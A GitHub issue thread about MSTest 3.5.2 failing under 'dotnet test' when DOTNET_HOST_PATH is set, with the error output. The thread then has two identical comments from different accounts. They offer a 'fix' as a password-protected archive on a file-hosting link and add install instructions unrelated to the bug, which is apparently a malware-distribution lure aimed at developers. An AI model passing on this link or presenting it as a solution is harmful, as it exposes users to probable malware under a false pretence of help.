### ISSUE TITLE
Test failure when DOTNET_HOST_PATH is set

### ISSUE THREAD

**Issue by stan-sz** [microsoft/testfx#3705]
## Describe the bug

For a net8.0 test MSTest.SDk project with 3.5.2, invoking a `dotnet test` from an app that was run with `dotnet run` (`DOTNET_HOST_PATH` is set to `C:\Program Files\dotnet\dotnet.EXE`) fails with:

```
error run failed: Tests failed: Possible reasons for this include:
error run failed:   * You misspelled a built-in dotnet command.
error run failed:   * You intended to execute a .NET program, but dotnet---internal-msbuild-node does not exist.
error run failed: Could not execute because the specified command or file was not found.
error run failed:   * You intended to run a global tool, but a dotnet-prefixed executable with this name could not be found on the PATH.
error run failed: 
error run failed: === COMMAND LINE ===
error run failed: C:\Program Files\dotnet\dotnet.EXE --internal-msbuild-node testingplatform.pipe.2b5570648ffa4d258f653af45f81ee40
```

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
